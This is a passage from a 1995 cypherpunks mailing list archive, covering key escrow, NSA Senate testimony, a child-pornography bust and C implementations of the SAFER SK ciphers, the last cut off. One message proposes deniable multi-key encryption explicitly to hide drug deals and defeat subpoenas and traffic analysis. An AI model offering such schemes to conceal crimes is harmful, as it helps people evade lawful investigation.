certifier coupled with some verifiable skill in appraising nuclear 
physics skill- a situation I would argue is almost impossible without a 
certificate from an institution which meets some base credentials, which 
are set up publically by a objective process, or nearly so.

> Note the other effects of the nets.  They make it hard to tell that you 
> *are* working which reduces the impact of regulations of work by 
> "illegal aliens."  Thus if I am wandering through the South of France 
> while writing the 'Great American Novel' I am unlikely to get busted for 
> violation of work restrictions.  The nets expand the number of jobs I 
> can do while innocently wandering the South of France.  I can or will 
> soon be able, for example, to manage a large international corporation 
> from anywhere.

This I understand and applaud.

> DCF
> 
> "Who actually prefers Le Massif Central to those hot and crowded southern 
> climes." 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Thu, 14 Sep 95 04:39:39 PDT
To: cypherpunks@toad.com
Subject: DD, pedaphiles, and Terrorists, oh my
Message-ID: <27512.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Today's Washington Post (9/14) has a front page article on a bust of
12 computer using pedaphiles.

NBC news is saying that Janet Reno will have a news conference
later this morning.

Tomorrow near NIS&T, the workshop on the Federal Key Escrow Standards
will be held.

Coincidence?

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob L <robl@on-ramp.ior.com>
Date: Thu, 14 Sep 95 07:56:40 PDT
To: Pat Farrell <pfarrell@netcom.com>
Subject: Re: DD, pedaphiles, and Terrorists, oh my
In-Reply-To: <27512.pfarrell@netcom.com>
Message-ID: <Pine.LNX.3.91.950914075351.4971A-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Sep 1995, Pat Farrell wrote:
> Today's Washington Post (9/14) has a front page article on a bust of
> 12 computer using pedaphiles.
> NBC news is saying that Janet Reno will have a news conference
> later this morning.
> Tomorrow near NIS&T, the workshop on the Federal Key Escrow Standards
> will be held.
> Coincidence?

<g> I think not.. Kind of like the coincidence that just before any gun 
law votes, some maniac goes on a shooting spree.. ;)

I would be interested to hear what Reno has to say.. if someone is in a 
position to hear/see it, and can drop the key parts here, I would 
appreciate it.

'Course, I would rather have pedophiles using computers than stalking parks..


Thanks-
RobL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 14 Sep 95 08:11:08 PDT
To: mnorton@cavern.uark.edu
Subject: Re: Digital Fingerprinting
Message-ID: <9509141507.AA21086@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: Mac Norton <mnorton@cavern.uark.edu>
> To: Patrick Horgan <patrick@Verity.COM>
> 
> On Wed, 13 Sep 1995, Patrick Horgan wrote:
> 
> > > 
> > > > Then, in W.Ky., as in Stockbridge, "You can get
> > > > anything you want..."? :)
> > > 
> > > I'd stick with:
> > > ***********************************************
> > > You can't always get what you want            1
> > > but if you try
> > > sometimes, sometimes you get what you need.   2
> > > ***********************************************
> > > 
> > > 1 ability to dump garbage where you want
> > > 2 a better appreciation for the environment
> > > :-)
> > 
> > 
> > Why do I feel like I'm sitting on the group W bench?
> 
> I don't know, kid, what you in for?
> 

Encryption.  And they all moved away from me on the group W bench there,
talking mean hairy eyeballs and all sorts of things until I said, and
annoying the NSA, and they all moved back, talking about crime, PEM, PGP,
and liberty and justice for all;)

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 14 Sep 95 08:25:06 PDT
To: "Rev. Ben" <cypherpunks@toad.com>
Subject: Re: WAS_tem
Message-ID: <199509141524.IAA00532@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



>> The bill would expand the definition of child pornography 
>> to include any [...] 
>> image produced by any means, including electronically by 
>> computer, if it depicts or appears to depict a minor 
>> engaging in sexually explicit conduct. 

At 10:40 AM 9/14/95 -0400, Rev. Ben wrote:
>If I'm reading this correctly, if I Photoshop a kids face onto the body 
>of the latest Playboy centerfold, I'm in violation of this proposed law?

If you draw a picture using paintbrush of an underage person engaging
in sexual conduct, you are in violation of this proposed legislation.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 14 Sep 95 05:23:52 PDT
To: cypherpunks@toad.com
Subject: WAS_tem
Message-ID: <199509141223.IAA08242@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-14-95. NYPaper.


   "Use of Computer Network For Child Sex Sets Off Raids."

      The Justice Department today announced a dozen arrests
      in a two year investigation into the use of America
      Online, the country's largest computer network, to
      distribute child pornography and to lure minors into
      sex. The culmination of the inquiry by the Federal
      Bureau of Investigation comes at a time when the agency
      has needed some favorable attention to offset a string
      of incidents that have cast it in a negative light.


   "Scientologists Lose a Battle on the Internet."

      Upholding free speech on the Internet, a Federal judge
      has ordered the Church of Scientology to return
      computers and files seized here last month from two men
      who used a computer bulletin board to disseminate
      information critical of the church. The equipment
      belongs to Factnet, an anti-Scientology bulletin board
      run by two Boulder men, Lawrence Wollersheim and Robert
      Penny.


   2x: WAS_tem  (16 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 14 Sep 95 08:28:51 PDT
To: nobody@REPLAY.COM
Subject: Re: NSA on GAK
Message-ID: <9509141525.AA21098@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


I've reformatted this to make it easier to read...If you've already read it,
then just delete it:)

~~~~~~~ Included reformatted stuff starts here --\/ ~~~~~~~~~~~~~~~~~~~~~~

URL: http://csrc.ncsl.nist.gov/secnews/ees_q-a.txt

----------

Note:  The following answers were provided by NSA to the Senate
Subcommittee on Technology and the Law in response to their follow-
up questions to the May 3, 1994 hearings.

                   ---------------------------

          Senate Subcommittee on Technology and the Law
 Hearing on the Administration's Key Escrow Encryption Standard

        Written Questions for Vice Admiral McConnell, NSA

*Questions for Senator Pressler:

Q:   Admiral, as you are aware, critics of the Administration's
proposal argue that as a practical matter, no criminal, foreign
spy, or terrorist of any sophisticated would be foolish enough to
use an encryption device designed by the NSA and approved by the
FBI.

How do you respond? Why do[n't you] think the people whose
telecommunications the NSA and the FBI want most to decode will be
the very people most unlikely to use this technology?

Answer:   From what we know today, the overriding requirement that
spies, terrorist, and criminals have is for readily available and
easy to use equipment that interoperates.  Key escrow encryption is
not meant to be a tool to catch criminals.  It will make excellent
encryption available to legitimate businesses and private citizens
without allowing criminals to use the telecommunications system to
plan and commit crimes with impunity.  We believe it would be
irresponsible for government to make excellent encryption broadly
available knowing that its use by criminals would make it
impossible for law enforcement agencies to conduct lawful wiretaps
against them.

The Department of Justice credits information gleaned through
wiretaps as leading to more than 20,000 felony convictions since
the early 1980s.  This would not have been possible if the
criminals had been using encryption systems the FBI could not
break.

Without government action, however, this fortunate situation
will change.  At present most people, and most criminals, don't use
encryption.  However, there is an increasing public awareness of
the value of encryption for protecting private personal and
business communications.  Increasing demand for encryption by the
public will likely lead to the widespread use of some form of
standardized encryption on the public telecommunications 
network.

This development would have great benefits for the country.
Legitimate businesses an private individuals could use the
telecommunications system secure in the knowledge that their
private information such as business records and credit card
numbers could not be intercepted by third parties.

But there is a down side.  Criminals, terrorists, and others
could also use the system to plan crimes, launder money, and the
like, completely secure in the knowledge that law enforcement
agencies could not listen to those communications.  Just as
legitimate businesses operate much more efficiently and effectively
using the telecommunications system than they could without it, so
will criminal enterprises be able to operate more efficiently and
effectively if they no longer have to avoid using the
telecommunications system.

The United States is faced with a choice.  We can sit back and
watch as the emerging national information infrastructure becomes
a valuable tool for criminals and terrorists to use to plan and
carry out their activities with complete security, or we can take
steps to maintain the current ability of government to conduct
lawful wiretaps so that prudent criminals will have to find other
less efficient ways to operate and foolish ones may be caught.  Key
escrow encryption is the later option.

Q:   Would widespread use of the Skipjack algorithm harm U.S.
exports?  Do you think it is unlikely foreign businesses will
purchase American encryption technology if the U.S. Government
holds a set of the decoding keys?

Answer:  I do not believe that widespread use of key escrow
encryption in the United States will harm U.S. exports.  If it has
any effect at all, it could increase exports somewhat.  Key escrow
encryption products provide another option for foreign purchasers
that they have not had in the past; to the extent that foreigners
doe purchase key escrow encryption products, it will mean an
increase in exports.  Meanwhile, U.S. exporters are free to
continue to sell the products they currently sell in foreign
markets and to seek license approvals for new products.

It is difficult to predict the foreign market for U.S. key
escrow encryption technology.  Businesses that fear U.S. Government
interception of their communications presumably would avoid
products for which the U.S. Government hold keys.  However, there
are a number of reasons why foreign businesses might purchase them.
One major reason would be to communicate securely with U.S.
businesses that use them.  In addition, the superior level of
security provided by key escrow products (against all but lawful
U.S. Government access) may make them attractive to foreign
business that do not view U.S Government access as a major concern.
While some prospective users abroad may steer clear of key escrow
products because the United States will retain access, there may be
many who believe they are unlikely to be targeted by U.S.
intelligence in any case or for whom the superior security offered
by key escrow encryption products against threats of greater
concern may make key escrow products an attractive option.  For
example, a distributor of pay-TV programming may depend on
encryption to ensure that only those viewers who pay for the
service can decrypt the TV signal.  Such a distributor probably
would not be concerned about the threat of access by the United
States Government, and might favor suitable key escrow encryption
products over competing products that use weaker encryption
algorithms.

Q:   You were present when the previous panelist, Stephen Walker,
described how present U.S. laws prohibit his company from exporting
encryption products.  As I understand it, Senator Murray's bill
S.1846, attempts to relax these export controls somewhat.

Please give us your views on this legislation.

Answer:  I support the Administration's position, as announced
by the White House on February 4, that current export controls must
remain in place and that regulatory changes should be implemented
to speed exports and reduce the licensing burden on exporters.  The
bill you reference appears to be inconsistent with the
Administration position.  I would be happy to provide you further
information on the Administration's reasons for maintaining the
current export controls in an appropriate setting.

*Questions from Senator Murray:

Q:    In my office in the Hart building this February, I downloaded
from the Internet an Austrian program that uses DES encryption.
This was on a laptop computer, using a modem over a phone line.
The Software Publishers' Association says there are at least 120
DES or comparable programs world wide.  However, U.S. export
control laws prohibit American exporters from selling comparable
DES programs abroad.

With at least 20 million people hooked up to the
Internet, how do U.S. export controls actually prevent criminals,
terrorists, or whoever from obtaining DES encryption software?

Answer:  Serious users of encryption do not entrust their
security to software distributed via networks o bulletin boards.
There is simply too much risk that viruses, Trojan Horses,
programming errors, and other security flaws may exist in such
software which could not be detected by the user.  Serious users of
encryption, those who depend on encryption to protect valuable data
and cannot afford to take such chances, instead turn to other
sources in which they can have greater confidence.  Such serious
users include not only entitles which may threaten U.S. national
security interests, but also businesses and other major consumers
of encryption products.  Encryption software distribution via
Internet, bulletin board, or modem does not undermine the
effectiveness of encryption export controls.   

[Primary written questions for Admiral McConnell]

1.   The Defense Authorization Bill for Fiscal Year 1994 has
authorized $800,000 to be spent by the National Research Council of
the National Academy of Sciences to conduct a study of federal
encryption policy.  Can we wait to implement the key escrow
encryption program until we have the benefit of the NRC's study?
Do you think this study is necessary?  Should this study be
expedited?

Answer:  We do not believe that we can wait until after the
NRC study is completed in 1996 to begin implementation of the key
escrow initiative.  The information technology industry is dynamic
and fast-moving, and to wait another two years or more would, we
believe, jeopardize the success of the initiative.  Industry demand
for encryption products is growing, and the technology is available
now to meet that demand with encryption products that provide an
outstanding level of security to the user conduct lawful wiretaps.
To wait for the completion of the NRC study to other encryption
products which would defeat lawful wiretaps.  We believe that such
a delay would not be in the best interest of the American 
people.

Neither do we believe that the study should be expedited.  For
our part, we will carefully consider the conclusions of the NRC
study.  We expect that it will give very careful consideration to
the issues, and we would not want the pressure of an unnecessarily
short deadline to limit the study group's ability to produce the
best report possible.

2.   The Administration has said that it is continuing to restrict
export of the most sophisticated encryption devices, in part,
"because of the concerns of our allies who fear that strong
encryption technology would inhibit their law enforcement
capabilities."  Do we really need to help our allies by prohibiting
the export of strong American encryption products, since those same
countries can simply control the encryption bought within their
borders?

Answer:  Exports of encryption products are subject to review
primarily to protect U.S. national interests, including national
security, law enforcement, foreign policy, and other important
interests.  The law enforcement concerns of our allies are a
consideration, especially as the ability of our allies to combat
terrorism, drug trafficking, and other international law
enforcement problems can have direct benefits to the United States.
However, foreign law enforcement concerns do not drive our export
control policy.  We would continue to review encryption exports to
protect U.S. national interests even if foreign law enforcement
concerns disappeared.

3.   Do you know whether foreign governments would be interested in
importing key escrow encryption products to which they hold the
decoding keys?

Answer:  Several foreign governments have expressed interest
in key escrow encryption technology due to their own law
enforcement concerns.  There have been some preliminary
discussions, but issues such as who would hold the escrowed keys
and the circumstances of government access to escrowed keys must be
fully vetted.

4.   The Government wants the key escrow encryption standard to
become the de facto industry standard in the United States.  Would
the Government abandon the Clipper Chip program if it is shown to
be unsuccessful beyond government use?

Answer:  We do not expect the program to be unsuccessful
beyond government.  We have developed a sound security product that
we expect will find many uses in government information systems and
further believe that government use will bring with it a commercial
market, particularly in the defense sector.  We have developed a
sound security product that we expect will find many uses in
government information systems regardless of its success in
commercial markets.

5.   Openly available devices, such as Intel-compatible
microprocessors, have seen dramatic gains, but only because
everyone was free to try to build a better version.  Given the
restrictions on who can build devices with the classified skipjack
algorithm, how will key escrow chips keep up with advances in
semiconductor speed, power, capacity and integration?

Answer:  Despite the requirements that a firm must meet to
produce key escrow encryption chips, we expect that there will be
a number of manufacturers competing against each other to produce
the best product, and that such competition will drive them to keep
up with the latest technological advances.  It is worth noting that
only a few companies can produce the sophisticated microprocessors
you reference, yet the competition in that market has driven them
to achieve remarkable advances in that technology.  NSA's STU-III
secure telephone program provides an example of a cryptographic
product line that keeps pace with technology.

The presence of a classified algorithm does not preclude
keeping pace with technology.  Through NSA's use of a competitive,
multi-vendor approach, STU-III secure telephone products have
continued to evolve in response to user requirements and
technological advances despite their use of a classified encryption
algorithm and the consequent need for security restrictions on the
manufacturers.

6.   How well does the Skipjack algorithm work on telecommunications
operating at very high speeds.  Is NSA working on another algorithm,
called BATON, that could be used in high speeds with a key escrow
system?  Will Capstone be compatible with BATON?

Answer:  Using currently available microelectronics technology
the SKIPJACK algorithm could not be used for encryption at very
high speeds.  BATON is the name of an algorithm developed by NSA
that could be used at higher rates of speed.  We have no plans to
develop key escrow encryption devices using BATON, however.
Instead, we are considering another algorithm for use at high
speeds with a key escrow system.

A high-speed key escrow device based on an algorithm other
than SKIPJACK would not be "compatible with Capstone" in the sense
that traffic encrypted by such a device could not be decrypted by
Capstone, and vice versa.  However, since such a device would be
used for much higher-speed applications than those for which
Capstone was designed, there would be no need for it to be
compatible with Capstone in that sense.

7.   Can Capstone be used to encrypt video programming?  If so,
have cable companies been approached by any government agency to
use Capstone to scramble or encrypt cable program?

Answer:  Capstone could be used to encrypt any digital signal,
including video programming, operating at up to about 10 million
bits per second.  It could be used for encrypting individual video
channels but not for bulk encryption of many channels multiplexed
together in a single link.  NSA is not aware of any government
agency approaching cable companies to urge the use of Capstone.
Two manufacturers have asked us about the suitability of key escrow
devices for this purpose, however.

8.   Encryption software is available that can be used with Clipper
to encrypt a message before after it has been encrypted with
Clipper.  This "double encrypting" risks bypassing the key escrow
feature.  If a sender first encrypts the message with software
using DES, and then transmits the message "double encrypted" with
Clipper, can tell you from looking at the cipher, or encrypted
text, that the underlying message was encrypted?

Answer:  The only way to tell that a message has been "double
encrypted" in this way would be to decrypt the "outer layer" of
encryption, i.e. that done with Clipper.  Only then would one be
able to tell that the message had first been encrypted with
something else.
 
----------

   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Thu, 14 Sep 95 05:36:40 PDT
To: keelings@wu1.wl.aecl.ca
Subject: Re: Scientology tries to break PGP - and
Message-ID: <v01520c00ac7d510fd201@[198.79.48.44]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

re:
>[snip]
>> When the safety is finally removed from the gun at your head (sorry for
>> the drama) you hand over your alternate secret key.  If decrypted with the
>> "alternate" or "fake" secret key, the encrypted file is wiped until it
>> reaches a marker; the remainder of the file is displayed.  If you use your
>> "primary" or "real key", the extraneous text is simply stripped.

Instead of stripping, how about adding an offset to the start and end of
the ciphertext to each encoded idea key.  This way, I can send text A to
key A, text B to key B, C to C and so on.  As long as the recipient and
I have agreed in advance on which key to use to exchange the real message,
who can say otherwise?  If code words are used in all the messages to
refer to any illegal acts, ("ship me 30 kilos of smack" might be a tad
incriminating) how can anything be proved even if the recipient is
compelled to divulge their key?

An added advantage to this scheme is that if properly used it should help
throw a monkey wrench into traffic analysis by the nosy.  If I regularly
exchange encrypted messages with several different recipients, I can
enclose a seperate plaintext for each, make one massive combined
cyphertext and send it to all of them.  The ones I have no instructions
or trade secrets for today will each receive "Ignore this message,"
followed by a randomly selected random number of fortunes or other random
data (so each message to be ignored will have different length different
plaintext to further thwart analysis).

This may be combined with stealth PGP headers to make it difficult for
LEAs to determine all recipients for the purpose of getting a subpeona
for their keys.

Joseph Block <jpb@miamisci.org>

"We can't be so fixated on our desire
 to preserve the rights of ordinary Americans ..."
 -- Bill Clinton  (USA TODAY, 11 March 1993, page 2A)
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMFek8mGnwFiC3O2NAQGx0QgArERNVabtUY3MMDaDfjFn+Jg4ZGQcV4oD
47qJDFqW4riQ6LtQW3YiptkVl/jGJcwzEyRTAb4v6mYeIXwaQi4Or0C041ADLGMo
RzB/tIIQSsF+oQYEI/lHL1t8jYi4737oU2BJrUJvgahsNS0V7TBTEtGhdDWFDjk9
bd74f//lJCmnvq/gqV02KqB0zL1YGAXoXLzzhZEMk3T2cxm9n5oRZX82zT4tCV0Q
Cw1jW7ZT+Bsaa099RJ7HvLQI4fqMeI7+NoBwhhtpZ/Iy8OWmEhaOz4Z50cZcbxf1
Ol6xMKXdHBVqK41cm7lyoH7Tpt7Zw1bSq4svONm6v2urwn9R9JHn+Q==
=8BlI
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hroller Anonymous Remailer <hroller@c2.org>
Date: Thu, 14 Sep 95 09:12:58 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509141607.JAA25886@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


/* SAFER SK-64 By James L. Massey who did not do this
   conversion and is not responsible for any bugs in it.

   This a 'C' conversion of the reference Turbo Pascal implementation

Examples of Encryption with SAFER SK-64 (i.e., with the strengthened key
schedule of 64 bits.)
 
PLAINTEXT is        1   2   3   4   5   6   7   8
The KEY is          0   0   0   0   0   0   0   1
after round 1     131 177  53  27 130 249 141 121
after round 2      68  73  32 102 134  54 206  57
after round 3     248 213 217  11  23  68   0 243
after round 4     194  62 109  79  24  18  13  84
after round 5     153 156 246 172  40  72 173  39
after round 6     154 242  34   6  61  35 216  28
CRYPTOGRAM is      21  27 255   2 173  17 191  45
 
PLAINTEXT is        1   2   3   4   5   6   7   8
The KEY is          1   2   3   4   5   6   7   8
after round 1     223  98 177 100  46 234  13 210
after round 2     182 246 230  93 158  14  48  89
after round 3      45 234 128 149  40 101  10 134
after round 4      30  17 249 236 158 120  69 100
after round 5       1 200 182 241   0 127 152 162
after round 6     144  85  94 214   5  38  65 150
CRYPTOGRAM is      95 206 155 162   5 132  56 199
*/


#include <stdio.h>


/* globals */

unsigned char a1,a2,a3,a4,a5,a6,a7,a8,
              b1,b2,b3,b4,b5,b6,b7,b8,
              r;

unsigned char k[21][8],k1[9];

int logtab[256],exptab[256],i,j,n;

mat1(p1,p2,q1,q2)
unsigned char p1,p2,*q1,*q2;
{
  *q2=p1+p2;
  *q1=*q2+p1;
}

invmat1(p1,p2,q1,q2)
unsigned char p1,p2,*q1,*q2;
{
  *q1=p1-p2;
  *q2=-*q1+p2;
}

init_tables()
{
/* This portion of the program computes the powers of the primitive
   element 45 of the finite field GF(257) and stores these numbers
   in the table "exptab".  The corresponding logarithms to the base
   45 are stored in the table "logtab" */

  logtab[1]=0;
  exptab[0]=1;

  for(i=1;i<=255;i++)
  {
    exptab[i]=(45*exptab[i-1]) % 257;
    logtab[exptab[i]]=i;
  }

  exptab[128]=0;
  logtab[0]=128;
  exptab[0]=1;
}

set_rounds()
{
  int rounds;

  do
  {
    printf("Enter number of rounds (max 10): ");
    scanf("%d",&rounds);
  } while(rounds<1 || rounds>10);

  r=(unsigned char)rounds;
}

get_plaintext()
{
  int i1,i2,i3,i4,i5,i6,i7,i8;

  printf("Enter plaintext as 8 bytes (0-255 separated by spaces)\n");
  scanf("%d%d%d%d%d%d%d%d",&i1,&i2,&i3,&i4,&i5,&i6,&i7,&i8);

  a1=(unsigned char)i1;
  a2=(unsigned char)i2;
  a3=(unsigned char)i3;
  a4=(unsigned char)i4;
  a5=(unsigned char)i5;
  a6=(unsigned char)i6;
  a7=(unsigned char)i7;
  a8=(unsigned char)i8;
}

get_key()
{
  int i1,i2,i3,i4,i5,i6,i7,i8;

  printf("Enter key as 8 bytes (0-255 separated by spaces)\n");
  scanf("%d%d%d%d%d%d%d%d",&i1,&i2,&i3,&i4,&i5,&i6,&i7,&i8);

  k[0][0]=k1[0]=(unsigned char)i1;
  k[0][1]=k1[1]=(unsigned char)i2;
  k[0][2]=k1[2]=(unsigned char)i3;
  k[0][3]=k1[3]=(unsigned char)i4;
  k[0][4]=k1[4]=(unsigned char)i5;
  k[0][5]=k1[5]=(unsigned char)i6;
  k[0][6]=k1[6]=(unsigned char)i7;
  k[0][7]=k1[7]=(unsigned char)i8;
}

key_schedule()
{
/* append a "parity byte" to the key k1 */

  k1[8]=k1[0]^k1[1]^k1[2]^k1[3]^k1[4]^k1[5]^k1[6]^k1[7];

/* derive keys k2, k3, ... k2r+1 from input key k1 */

  for(n=2;n<=(2*r)+1;n++)
  {
  /* each byte of the key k1 is left rotated by 3 */

    for(j=0;j<=8;j++)
      k1[j]=(k1[j]<<3) + (k1[j]>>5);

  /* the key bias is added here to the right rotated k1 */

    for(j=1;j<=8;j++)
      k[n-1][j-1]=k1[(j+n-2) % 9]+exptab[exptab[(9*n)+j]];
  }
}

encrypt()
{
  for(i=1;i<=r;i++)
  {
  /* Key 2i-1 is mixed bit and byte added  to the round input */

    a1=a1 ^ k[2*i-2][0];
    a2=a2 + k[2*i-2][1];
    a3=a3 + k[2*i-2][2];
    a4=a4 ^ k[2*i-2][3];
    a5=a5 ^ k[2*i-2][4];
    a6=a6 + k[2*i-2][5];
    a7=a7 + k[2*i-2][6];
    a8=a8 ^ k[2*i-2][7];

  /* The result now passes through the nonlinear layer */

    b1=exptab[a1];
    b2=logtab[a2];
    b3=logtab[a3];
    b4=exptab[a4];
    b5=exptab[a5];
    b6=logtab[a6];
    b7=logtab[a7];
    b8=exptab[a8];

  /* Key 2i is now mixed byte and bit added to the result */

    b1=b1 + k[2*i-1][0];
    b2=b2 ^ k[2*i-1][1];
    b3=b3 ^ k[2*i-1][2];
    b4=b4 + k[2*i-1][3];
    b5=b5 + k[2*i-1][4];
    b6=b6 ^ k[2*i-1][5];
    b7=b7 ^ k[2*i-1][6];
    b8=b8 + k[2*i-1][7];

  /* The result now enters the linear layer */

    mat1(b1,b2,&a1,&a2);
    mat1(b3,b4,&a3,&a4);
    mat1(b5,b6,&a5,&a6);
    mat1(b7,b8,&a7,&a8);

    mat1(a1,a3,&b1,&b2);
    mat1(a5,a7,&b3,&b4);
    mat1(a2,a4,&b5,&b6);
    mat1(a6,a8,&b7,&b8);

    mat1(b1,b3,&a1,&a2);
    mat1(b5,b7,&a3,&a4);
    mat1(b2,b4,&a5,&a6);
    mat1(b6,b8,&a7,&a8);

  /* The round is now completed! */

    printf("after round %d   %3d %3d %3d %3d %3d %3d %3d %3d\n",
	   (int)i,a1,a2,a3,a4,a5,a6,a7,a8);
  }

/* Key 2r+1 is now mixed bit and byte added to produce the final cryptogram */

  a1=a1 ^ k[2*r][0];
  a2=a2 + k[2*r][1];
  a3=a3 + k[2*r][2];
  a4=a4 ^ k[2*r][3];
  a5=a5 ^ k[2*r][4];
  a6=a6 + k[2*r][5];
  a7=a7 + k[2*r][6];
  a8=a8 ^ k[2*r][7];
}

main()
{
  init_tables();
  for(;;)
  {
    set_rounds();
    get_plaintext();
    get_key();

    printf("PLAINTEXT is    %3d %3d %3d %3d %3d %3d %3d %3d\n",
	   a1,a2,a3,a4,a5,a6,a7,a8);
    printf("THE KEY IS      %3d %3d %3d %3d %3d %3d %3d %3d\n",
	   k[0][0],k[0][1],k[0][2],k[0][3],k[0][4],k[0][5],k[0][6],k[0][7]);

    key_schedule();
    encrypt();

    printf("CRYPTOGRAM IS   %3d %3d %3d %3d %3d %3d %3d %3d\n\n",
	   a1,a2,a3,a4,a5,a6,a7,a8);
  }
}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hroller Anonymous Remailer <hroller@c2.org>
Date: Thu, 14 Sep 95 09:19:58 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509141614.JAA26330@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


/* SAFER SK-128 designed by James L. Massey who did not do this
   conversion and is not responsible for any bugs in it.

   This a 'C' conversion of the reference Turbo Pascal implementation

Examples of Encryption with SAFER SK-128 (i.e., 
with the strengthened key schedule of 128 bits.)

PLAINTEXT is        1   2   3   4   5   6   7   8
KEY Ka is           0   0   0   0   0   0   0   1
KEY Kb is           0   0   0   0   0   0   0   1
after round 1     131 177  53  27 130 249 141 121
after round 2      68  73  32 102 134  54 206  57
after round 3     248 213 217  11  23  68   0 243
after round 4     194  62 109  79  24  18  13  84
after round 5     153 156 246 172  40  72 173  39
after round 6     154 242  34   6  61  35 216  28
after round 7     100  31 172  67  44  75 133 219
after round 8      78 226 239 135 210  83  93  72
after round 9      72  64  46 195 163 159 243 114
after round10       3 133  76 190 191  52 220 123
CRYPTOGRAM is      65  76  84  90 182 153  74 247
 
PLAINTEXT is        1   2   3   4   5   6   7   8
KEY Ka is           1   2   3   4   5   6   7   8
KEY Kb is           0   0   0   0   0   0   0   0
after round 1      64 214  74 216 103 222  26  54
after round 2      61  14  68  15  46 111 124  80
after round 3     197 124  96  59 255  24   2  30
after round 4      63  59 214 103 236 166 153  24
after round 5      66 254  26  45 152 223   5 122
after round 6      89  47  58 105 161  38 135  45
after round 7      19 202 174  44  57 206  52  25
after round 8      78 179 113 208 169  26 121  22
after round 9      53  17  81 215 120  37 206 246
after round10     189 177   9   0 186  82 208 253
CRYPTOGRAM is     255 120  17 228 179 167  46 113
 
PLAINTEXT is        1   2   3   4   5   6   7   8
KEY Ka is           0   0   0   0   0   0   0   0
KEY Kb is           1   2   3   4   5   6   7   8
after round 1      95 186 209 220 166  66 213  10
after round 2     200  65 189 120  96 135  42 166
after round 3      64 169  43 166 132 171  31  40
after round 4     199 167  76 189 145 158 241  19
after round 5      71  55 184 212 108 198  77 108
after round 6     173 197 139  11  17  48  97  59
after round 7      17  51 142   4 170   7 207 124
after round 8      62 205 253 225 167 179 228 202
after round 9     133 168 127 138 193 243  34 226
after round10      59 194  69 220 220 231 123 148
CRYPTOGRAM is      73 201 157 152 165 188  89   8
*/


#include <stdio.h>


/* globals */

unsigned char a1,a2,a3,a4,a5,a6,a7,a8,
              b1,b2,b3,b4,b5,b6,b7,b8,
              r;

unsigned char k[25][8],ka[9],kb[9];

int logtab[256],exptab[256],i,j,n;

mat1(p1,p2,q1,q2)
unsigned char p1,p2,*q1,*q2;
{
  *q2=p1+p2;
  *q1=*q2+p1;
}

invmat1(p1,p2,q1,q2)
unsigned char p1,p2,*q1,*q2;
{
  *q1=p1-p2;
  *q2=-*q1+p2;
}

init_tables()
{
/* This portion of the program computes the powers of the primitive
   element 45 of the finite field GF(257) and stores these numbers
   in the table "exptab".  The corresponding logarithms to the base
   45 are stored in the table "logtab" */

  logtab[1]=0;
  exptab[0]=1;

  for(i=1;i<=255;i++)
  {
    exptab[i]=(45*exptab[i-1]) % 257;
    logtab[exptab[i]]=i;
  }

  exptab[128]=0;
  logtab[0]=128;
  exptab[0]=1;
}

set_rounds()
{
  int rounds;

  do
  {
    printf("Enter number of rounds (max 12): ");
    scanf("%d",&rounds);
  } while(rounds<1 || rounds>12);

  r=(unsigned char)rounds;
}

get_plaintext()
{
  int i1,i2,i3,i4,i5,i6,i7,i8;

  printf("Enter plaintext as 8 bytes (0-255 separated by spaces)\n");
  scanf("%d%d%d%d%d%d%d%d",&i1,&i2,&i3,&i4,&i5,&i6,&i7,&i8);

  a1=(unsigned char)i1;
  a2=(unsigned char)i2;
  a3=(unsigned char)i3;
  a4=(unsigned char)i4;
  a5=(unsigned char)i5;
  a6=(unsigned char)i6;
  a7=(unsigned char)i7;
  a8=(unsigned char)i8;
}

get_key()
{
